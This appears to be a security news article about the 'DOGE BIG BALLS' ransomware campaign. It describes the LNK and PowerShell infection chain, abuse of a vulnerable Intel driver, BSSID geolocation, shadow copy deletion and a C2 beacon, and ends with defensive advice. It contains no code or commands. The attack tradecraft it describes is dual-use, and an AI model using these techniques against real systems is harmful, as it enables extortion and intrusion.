A new and highly sophisticated ransomware campaign, dubbed “DOGE BIG BALLS Ransomware,” has recently come to light, demonstrating a blend of technical innovation and psychological manipulation.
This operation stands out for its multi-stage infection chain, which begins with a seemingly innocuous ZIP file and culminates in the deployment of a customized ransomware payload, all while leveraging advanced evasion techniques.
Infection Chain: ZIP Files and LNK Shortcuts
The attack typically starts with a ZIP file, often themed around financial matters such as “Pay Adjustment.zip.” Inside, a deceptive LNK (shortcut) file masquerades as a PDF or other legitimate document.
.png
)
When the victim opens this shortcut, it silently executes a series of PowerShell commands.
These commands download and run a script that checks for administrative privileges and, depending on the user’s access level, downloads additional malicious files.
If administrative rights are detected, the script creates a hidden folder in the system’s startup directory and downloads a modified version of the Fog ransomware disguised as “Adobe Acrobat.exe.”
It also retrieves a kernel exploit tool, “ktool.exe,” which is crucial for the next phase of the attack.
For non-admin users, the ransomware is placed in a user-specific startup folder, likely to be triggered later.
The PowerShell scripts used in this campaign are notable for their anti-analysis features and psychological tactics.
They include provocative statements and references to real individuals, likely intended to confuse or intimidate victims and analysts.
BYOVD: Exploiting Vulnerable Drivers
A standout feature of this campaign is its use of the Bring Your Own Vulnerable Driver (BYOVD) technique.
The attackers exploit a known vulnerability in an Intel driver (CVE-2015-2291) to gain kernel-level access.
This allows them to escalate privileges, disable security logging, and ensure the ransomware can operate undetected.
The kernel exploit tool is executed with a process ID and a hardcoded key, acting as an execution guardrail to prevent unauthorized use.
Before encrypting files, the ransomware collects extensive system and network information, including hardware IDs, network configurations, and running processes.
Uniquely, it queries the Wigle.net API using the MAC address of the victim’s router (BSSID) to determine the physical location of the device.
This method provides far more accurate geolocation than traditional IP-based techniques, indicating a highly targeted approach.
Ransomware Execution and Psychological Manipulation
Once executed, the ransomware displays a confirmation prompt, opens a ransom note, and logs its activities.
The ransom note references a real individual, Edward Coristine, and demands payment in Monero cryptocurrency.
The branding and references appear designed to mislead, intimidate, or malign specific individuals or organizations.
After encrypting files with the “.flocked” extension, the ransomware drops ransom notes in every affected folder and deletes shadow volume copies to prevent recovery.
The attack also embeds a Havoc C2 beacon, suggesting the potential for long-term access or further post-encryption activities.
Anti-analysis techniques, such as environment variable checks, are used to evade detection in sandboxed or monitored environments.
To defend against such advanced threats, organizations should:
- Block execution of untrusted LNK files and PowerShell scripts.
- Monitor PowerShell activity and process chains for anomalies.
- Deploy Endpoint Detection and Response (EDR) solutions.
- Limit administrative privileges and monitor for privilege escalation.
- Restrict outbound traffic to unauthorized cloud services and monitor for suspicious API calls.
The DOGE BIG BALLS ransomware campaign exemplifies the evolving sophistication of cyber threats, combining technical innovation with psychological tactics to maximize impact and evade detection.
Robust, layered security measures are essential to defend against such multi-faceted attacks.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
 file.){kind=link}